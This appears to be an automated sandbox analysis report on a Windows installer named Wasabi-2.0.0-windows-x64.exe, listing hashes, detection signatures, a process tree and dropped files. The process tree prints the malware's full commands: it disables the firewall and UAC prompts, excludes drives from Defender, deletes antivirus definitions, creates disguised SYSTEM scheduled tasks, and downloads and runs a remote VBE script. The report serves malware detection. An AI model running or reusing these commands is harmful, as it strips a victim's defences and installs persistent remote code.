Analysis
-
max time kernel
66s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
11-01-2023 11:33
Static task
static1
Behavioral task
behavioral1
Sample
Wasabi-2.0.0-windows-x64.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
Wasabi-2.0.0-windows-x64.exe
Resource
win10v2004-20220901-en
General
-
Target
Wasabi-2.0.0-windows-x64.exe
-
Size
80.2MB
-
MD5
d891a0dd3031ba640ad4ac38e637193d
-
SHA1
aa8d36b8b0df86458c4c2c584209938bfd2a21ff
-
SHA256
cabfd8d8f97582b86787a83a1dee4446d0f2e3ba4f346884c5cd6e242b61df78
-
SHA512
cd4e2db41df7a843a5bc1fa8cb0ac9778ffe315311aa19a84c1e36e122af38ff6e61d3bbe26582f508c1ecfc36b5df2a2f988ed1450d4e7c10499c319c130a6d
-
SSDEEP
1572864:fm9oNpXGKGC5kSQUwOy5NpYpnFzGl4vBzDKBbRUfJUNQxup00Hc1q8ACfH85Ckwq:e6ZG+Qoy5NoFilK9KJRxNQgv81/Apnwq
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 1132 MpCmdRun.exe -
Processes:
WScript.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications WScript.exe -
Processes:
powershell.exepowershell.exepowershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" powershell.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Processes:
WScript.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\UX Configuration WScript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\UX Configuration\Notification_Suppress = "1" WScript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\UX Configuration\UILockdown = "0" WScript.exe -
Drops file in Windows directory 2 IoCs
Processes:
Dism.exeDism.exedescription ioc process File opened for modification C:\Windows\Logs\DISM\dism.log Dism.exe File opened for modification C:\Windows\Logs\DISM\dism.log Dism.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2560 schtasks.exe 2592 schtasks.exe -
Processes:
Wasabi-2.0.0-windows-x64.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main Wasabi-2.0.0-windows-x64.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1352 powershell.exe 1616 powershell.exe 820 powershell.exe 2008 powershell.exe 1420 powershell.exe 1860 powershell.exe 1744 powershell.exe 1560 powershell.exe 1548 powershell.exe 760 powershell.exe 2408 powershell.exe -
Suspicious use of AdjustPrivilegeToken 15 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeAUDIODG.EXEdescription pid process Token: SeDebugPrivilege 2008 powershell.exe Token: SeDebugPrivilege 1352 powershell.exe Token: SeDebugPrivilege 820 powershell.exe Token: SeDebugPrivilege 1616 powershell.exe Token: SeDebugPrivilege 1420 powershell.exe Token: SeDebugPrivilege 1744 powershell.exe Token: SeDebugPrivilege 760 powershell.exe Token: SeDebugPrivilege 1560 powershell.exe Token: SeDebugPrivilege 1548 powershell.exe Token: SeDebugPrivilege 1860 powershell.exe Token: SeDebugPrivilege 2408 powershell.exe Token: 33 2632 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2632 AUDIODG.EXE Token: 33 2632 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2632 AUDIODG.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
Wasabi-2.0.0-windows-x64.exepid process 2024 Wasabi-2.0.0-windows-x64.exe 2024 Wasabi-2.0.0-windows-x64.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Wasabi-2.0.0-windows-x64.exeWScript.exeWScript.exepowershell.exepowershell.exedescription pid process target process PID 2024 wrote to memory of 1384 2024 Wasabi-2.0.0-windows-x64.exe WScript.exe PID 2024 wrote to memory of 1384 2024 Wasabi-2.0.0-windows-x64.exe WScript.exe PID 2024 wrote to memory of 1384 2024 Wasabi-2.0.0-windows-x64.exe WScript.exe PID 2024 wrote to memory of 1384 2024 Wasabi-2.0.0-windows-x64.exe WScript.exe PID 1384 wrote to memory of 920 1384 WScript.exe WScript.exe PID 1384 wrote to memory of 920 1384 WScript.exe WScript.exe PID 1384 wrote to memory of 920 1384 WScript.exe WScript.exe PID 1384 wrote to memory of 920 1384 WScript.exe WScript.exe PID 920 wrote to memory of 2008 920 WScript.exe powershell.exe PID 920 wrote to memory of 2008 920 WScript.exe powershell.exe PID 920 wrote to memory of 2008 920 WScript.exe powershell.exe PID 920 wrote to memory of 2008 920 WScript.exe powershell.exe PID 920 wrote to memory of 1860 920 WScript.exe powershell.exe PID 920 wrote to memory of 1860 920 WScript.exe powershell.exe PID 920 wrote to memory of 1860 920 WScript.exe powershell.exe PID 920 wrote to memory of 1860 920 WScript.exe powershell.exe PID 920 wrote to memory of 1560 920 WScript.exe powershell.exe PID 920 wrote to memory of 1560 920 WScript.exe powershell.exe PID 920 wrote to memory of 1560 920 WScript.exe powershell.exe PID 920 wrote to memory of 1560 920 WScript.exe powershell.exe PID 920 wrote to memory of 760 920 WScript.exe powershell.exe PID 920 wrote to memory of 760 920 WScript.exe powershell.exe PID 920 wrote to memory of 760 920 WScript.exe powershell.exe PID 920 wrote to memory of 760 920 WScript.exe powershell.exe PID 920 wrote to memory of 820 920 WScript.exe powershell.exe PID 920 wrote to memory of 820 920 WScript.exe powershell.exe PID 920 wrote to memory of 820 920 WScript.exe powershell.exe PID 920 wrote to memory of 820 920 WScript.exe powershell.exe PID 920 wrote to memory of 1744 920 WScript.exe powershell.exe PID 920 wrote to memory of 1744 920 WScript.exe powershell.exe PID 920 wrote to memory of 1744 920 WScript.exe powershell.exe PID 920 wrote to memory of 1744 920 WScript.exe powershell.exe PID 920 wrote to memory of 1548 920 WScript.exe powershell.exe PID 920 wrote to memory of 1548 920 WScript.exe powershell.exe PID 920 wrote to memory of 1548 920 WScript.exe powershell.exe PID 920 wrote to memory of 1548 920 WScript.exe powershell.exe PID 920 wrote to memory of 1420 920 WScript.exe powershell.exe PID 920 wrote to memory of 1420 920 WScript.exe powershell.exe PID 920 wrote to memory of 1420 920 WScript.exe powershell.exe PID 920 wrote to memory of 1420 920 WScript.exe powershell.exe PID 920 wrote to memory of 1352 920 WScript.exe powershell.exe PID 920 wrote to memory of 1352 920 WScript.exe powershell.exe PID 920 wrote to memory of 1352 920 WScript.exe powershell.exe PID 920 wrote to memory of 1352 920 WScript.exe powershell.exe PID 920 wrote to memory of 1616 920 WScript.exe powershell.exe PID 920 wrote to memory of 1616 920 WScript.exe powershell.exe PID 920 wrote to memory of 1616 920 WScript.exe powershell.exe PID 920 wrote to memory of 1616 920 WScript.exe powershell.exe PID 1352 wrote to memory of 1132 1352 powershell.exe MpCmdRun.exe PID 1352 wrote to memory of 1132 1352 powershell.exe MpCmdRun.exe PID 1352 wrote to memory of 1132 1352 powershell.exe MpCmdRun.exe PID 1352 wrote to memory of 1132 1352 powershell.exe MpCmdRun.exe PID 1616 wrote to memory of 2100 1616 powershell.exe Dism.exe PID 1616 wrote to memory of 2100 1616 powershell.exe Dism.exe PID 1616 wrote to memory of 2100 1616 powershell.exe Dism.exe PID 1616 wrote to memory of 2100 1616 powershell.exe Dism.exe PID 1616 wrote to memory of 2220 1616 powershell.exe Dism.exe PID 1616 wrote to memory of 2220 1616 powershell.exe Dism.exe PID 1616 wrote to memory of 2220 1616 powershell.exe Dism.exe PID 1616 wrote to memory of 2220 1616 powershell.exe Dism.exe PID 920 wrote to memory of 2408 920 WScript.exe powershell.exe PID 920 wrote to memory of 2408 920 WScript.exe powershell.exe PID 920 wrote to memory of 2408 920 WScript.exe powershell.exe PID 920 wrote to memory of 2408 920 WScript.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Wasabi-2.0.0-windows-x64.exe"C:\Users\Admin\AppData\Local\Temp\Wasabi-2.0.0-windows-x64.exe"1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\configuration\config.vbe"2⤵
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\SysWOW64\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\configuration\config.vbe" /elevate3⤵
- Modifies Windows Defender notification settings
- Windows security modification
- Suspicious use of WriteProcessMemory
PID:920 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Force; Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Force;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1860 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 04⤵
- UAC bypass
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1560 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorUser -Value 04⤵
- UAC bypass
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:760 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name EnableLUA ​​-Value 14⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:820 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name PromptOnSecureDesktop -Value 04⤵
- UAC bypass
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1744 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C: -Force;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1548 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionProcess *.exe, *.bat, *.vbs, *.vbe -Force;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1420 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-Location 'C:\Program Files\Windows Defender'; .\mpcmdrun.exe -RemoveDefinitions -All;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1352 -
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All5⤵
- Deletes Windows Defender Definitions
PID:1132 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Install-WindowsFeature NET-Framework-Core; DISM /Online /Enable-Feature /FeatureName:"NetFx3"; DISM /Online /Enable-Feature /FeatureName:NetFx3 /All; Enable-WindowsOptionalFeature -Online -FeatureName "NetFx3";4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\SysWOW64\Dism.exe"C:\Windows\system32\Dism.exe" /Online /Enable-Feature /FeatureName:NetFx35⤵
- Drops file in Windows directory
PID:2100 -
C:\Windows\SysWOW64\Dism.exe"C:\Windows\system32\Dism.exe" /Online /Enable-Feature /FeatureName:NetFx3 /All5⤵
- Drops file in Windows directory
PID:2220 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Net.ServicePointManager]::SecurityProtocol = 'tls12, tls11, tls'; iwr https://github.com/BejaminGofer81/p/raw/main/post.vbe -OutFile C:\ProgramData\post.vbe; start C:\ProgramData\post.vbe;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ProgramData\Microsoft\Google\src.bat" "4⤵PID:2500
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Create /TN "GoogleUpdateTaskUserS-1-5-21-1957224488-855655398-725946643-1003Core" /RU "NT AUTHORITY\SYSTEM" /TR "C:\ProgramData\Microsoft\Google\Update\1.3.36.152\update.bat" /SC DAILY /ST 20:30 /F /RL HIGHEST5⤵
- Creates scheduled task(s)
PID:2560 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Create /TN "GoogleUpdateTaskUserS-1-5-21-1957224488-855655398-725946643-1003UA" /RU "NT AUTHORITY\SYSTEM" /TR "C:\ProgramData\Microsoft\Google\Update\1.3.36.152\update.bat" /SC ONSTART /F /RL HIGHEST5⤵
- Creates scheduled task(s)
PID:2592 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off4⤵PID:2524
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off5⤵
- Modifies Windows Firewall
PID:2576
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:2284
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4701⤵
- Suspicious use of AdjustPrivilegeToken
PID:2632
-
C:\Windows\system32\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "1264" "3272"1⤵PID:2724
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Google\src.batFilesize
775B
MD51a7f60c6657bb003216db72b4f550a26
SHA10fed1e332b2570a3ceed6d3d7482f31a91d95f0e
SHA2569798ff8cd05e753d3dd68f78a2541ab6d5f62a6a2442e7c40218cfb4313fcd06
SHA5122e1b529820262919784394861ac4df552a083336920432e3c5fff5b0b08cce1a105532c58cc4a392649e2482772bcf57cd0c6ceb69b7137293934ca7ae9e3a12
-
C:\Users\Admin\AppData\Local\Temp\configuration\config.vbeFilesize
9KB
MD53cf9755443bb956bc8dbec8589692a53
SHA12b9551af484fbf7efea22ed41e264e2e03d253ff
SHA25638399c8324cfc525569a77fa8152bc1aa74084213cfa9e38e205c9f96a13e67c
SHA512cf156564be1e556b671f0b9f0bafb019c7b9450d8587636a3b3da3823b893c6c49b5a16310ee804fb201476ec7c3630ed22f7c89812cf2fecd792d5c7ba408d4
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD544d1b617d5a7478552aaf51b82d61b8c
SHA1c2878f36169516910bbf355fd245fd749c8a3f4c
SHA256cf1c554a2ea27fc65ebd44405844bc43441fa4913a900fab66a3dbdec76be283
SHA5125a13149fd6154e6c27bed14a6549ec05d425bf4b5cbb9df54641ccb7a9de0f89253092ae813160d9c183f0d5e5635b38e1f8b965deae7c5b87d161b0f2ba9b99
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD544d1b617d5a7478552aaf51b82d61b8c
SHA1c2878f36169516910bbf355fd245fd749c8a3f4c
SHA256cf1c554a2ea27fc65ebd44405844bc43441fa4913a900fab66a3dbdec76be283
SHA5125a13149fd6154e6c27bed14a6549ec05d425bf4b5cbb9df54641ccb7a9de0f89253092ae813160d9c183f0d5e5635b38e1f8b965deae7c5b87d161b0f2ba9b99
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD544d1b617d5a7478552aaf51b82d61b8c
SHA1c2878f36169516910bbf355fd245fd749c8a3f4c
SHA256cf1c554a2ea27fc65ebd44405844bc43441fa4913a900fab66a3dbdec76be283
SHA5125a13149fd6154e6c27bed14a6549ec05d425bf4b5cbb9df54641ccb7a9de0f89253092ae813160d9c183f0d5e5635b38e1f8b965deae7c5b87d161b0f2ba9b99
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD544d1b617d5a7478552aaf51b82d61b8c
SHA1c2878f36169516910bbf355fd245fd749c8a3f4c
SHA256cf1c554a2ea27fc65ebd44405844bc43441fa4913a900fab66a3dbdec76be283
SHA5125a13149fd6154e6c27bed14a6549ec05d425bf4b5cbb9df54641ccb7a9de0f89253092ae813160d9c183f0d5e5635b38e1f8b965deae7c5b87d161b0f2ba9b99
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD544d1b617d5a7478552aaf51b82d61b8c
SHA1c2878f36169516910bbf355fd245fd749c8a3f4c
SHA256cf1c554a2ea27fc65ebd44405844bc43441fa4913a900fab66a3dbdec76be283
SHA5125a13149fd6154e6c27bed14a6549ec05d425bf4b5cbb9df54641ccb7a9de0f89253092ae813160d9c183f0d5e5635b38e1f8b965deae7c5b87d161b0f2ba9b99
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD544d1b617d5a7478552aaf51b82d61b8c
SHA1c2878f36169516910bbf355fd245fd749c8a3f4c
SHA256cf1c554a2ea27fc65ebd44405844bc43441fa4913a900fab66a3dbdec76be283
SHA5125a13149fd6154e6c27bed14a6549ec05d425bf4b5cbb9df54641ccb7a9de0f89253092ae813160d9c183f0d5e5635b38e1f8b965deae7c5b87d161b0f2ba9b99
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD544d1b617d5a7478552aaf51b82d61b8c
SHA1c2878f36169516910bbf355fd245fd749c8a3f4c
SHA256cf1c554a2ea27fc65ebd44405844bc43441fa4913a900fab66a3dbdec76be283
SHA5125a13149fd6154e6c27bed14a6549ec05d425bf4b5cbb9df54641ccb7a9de0f89253092ae813160d9c183f0d5e5635b38e1f8b965deae7c5b87d161b0f2ba9b99
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD544d1b617d5a7478552aaf51b82d61b8c
SHA1c2878f36169516910bbf355fd245fd749c8a3f4c
SHA256cf1c554a2ea27fc65ebd44405844bc43441fa4913a900fab66a3dbdec76be283
SHA5125a13149fd6154e6c27bed14a6549ec05d425bf4b5cbb9df54641ccb7a9de0f89253092ae813160d9c183f0d5e5635b38e1f8b965deae7c5b87d161b0f2ba9b99
-
C:\Windows\Logs\DISM\dism.logFilesize
149KB
MD54eccb4207400a5427d99b3721a472b53
SHA1286589ac2c03bdbef51ba3b692870a059d62f97d
SHA2564811439283c253a5941ca84c11863b7f4a2a5f18dcb444ce3bc94228e5a83b73
SHA5122f6b07d7728b1f3022d7a9ecb8baec9961af919e1cdf8db2f937fcb6a60e27f4bc975e1e883a72b7f37479c6198b42a81b7045512d425cf294077221da612bb7
-
memory/760-97-0x0000000073240000-0x00000000737EB000-memory.dmpFilesize
5.7MB
-
memory/760-111-0x0000000073240000-0x00000000737EB000-memory.dmpFilesize
5.7MB
-
memory/760-72-0x0000000000000000-mapping.dmp
-
memory/820-73-0x0000000000000000-mapping.dmp
-
memory/820-99-0x0000000073240000-0x00000000737EB000-memory.dmpFilesize
5.7MB
-
memory/820-112-0x0000000073240000-0x00000000737EB000-memory.dmpFilesize
5.7MB
-
memory/920-67-0x0000000000000000-mapping.dmp
-
memory/1132-106-0x0000000000000000-mapping.dmp
-
memory/1352-82-0x0000000000000000-mapping.dmp
-
memory/1352-116-0x0000000073240000-0x00000000737EB000-memory.dmpFilesize
5.7MB
-
memory/1352-96-0x0000000073240000-0x00000000737EB000-memory.dmpFilesize
5.7MB
-
memory/1384-64-0x0000000000000000-mapping.dmp
-
memory/1420-80-0x0000000000000000-mapping.dmp
-
memory/1420-101-0x0000000073240000-0x00000000737EB000-memory.dmpFilesize
5.7MB
-
memory/1420-113-0x0000000073240000-0x00000000737EB000-memory.dmpFilesize
5.7MB
-
memory/1548-115-0x0000000073240000-0x00000000737EB000-memory.dmpFilesize
5.7MB
-
memory/1548-104-0x0000000073240000-0x00000000737EB000-memory.dmpFilesize
5.7MB
-
memory/1548-78-0x0000000000000000-mapping.dmp
-
memory/1560-108-0x0000000073240000-0x00000000737EB000-memory.dmpFilesize
5.7MB
-
memory/1560-71-0x0000000000000000-mapping.dmp
-
memory/1560-105-0x0000000073240000-0x00000000737EB000-memory.dmpFilesize
5.7MB
-
memory/1616-100-0x0000000073240000-0x00000000737EB000-memory.dmpFilesize
5.7MB
-
memory/1616-84-0x0000000000000000-mapping.dmp
-
memory/1616-119-0x0000000073240000-0x00000000737EB000-memory.dmpFilesize
5.7MB
-
memory/1744-107-0x0000000073240000-0x00000000737EB000-memory.dmpFilesize
5.7MB
-
memory/1744-98-0x0000000073240000-0x00000000737EB000-memory.dmpFilesize
5.7MB
-
memory/1744-76-0x0000000000000000-mapping.dmp
-
memory/1860-102-0x0000000073240000-0x00000000737EB000-memory.dmpFilesize
5.7MB
-
memory/1860-110-0x0000000073240000-0x00000000737EB000-memory.dmpFilesize
5.7MB
-
memory/1860-70-0x0000000000000000-mapping.dmp
-
memory/2008-114-0x0000000073240000-0x00000000737EB000-memory.dmpFilesize
5.7MB
-
memory/2008-69-0x0000000000000000-mapping.dmp
-
memory/2008-103-0x0000000073240000-0x00000000737EB000-memory.dmpFilesize
5.7MB
-
memory/2024-54-0x0000000076391000-0x0000000076393000-memory.dmpFilesize
8KB
-
memory/2100-109-0x0000000000000000-mapping.dmp
-
memory/2220-117-0x0000000000000000-mapping.dmp
-
memory/2284-120-0x000007FEFBA81000-0x000007FEFBA83000-memory.dmpFilesize
8KB
-
memory/2408-121-0x0000000000000000-mapping.dmp
-
memory/2408-124-0x0000000073A70000-0x000000007401B000-memory.dmpFilesize
5.7MB
-
memory/2500-125-0x0000000000000000-mapping.dmp
-
memory/2524-126-0x0000000000000000-mapping.dmp
-
memory/2560-128-0x0000000000000000-mapping.dmp
-
memory/2576-129-0x0000000000000000-mapping.dmp
-
memory/2592-130-0x0000000000000000-mapping.dmp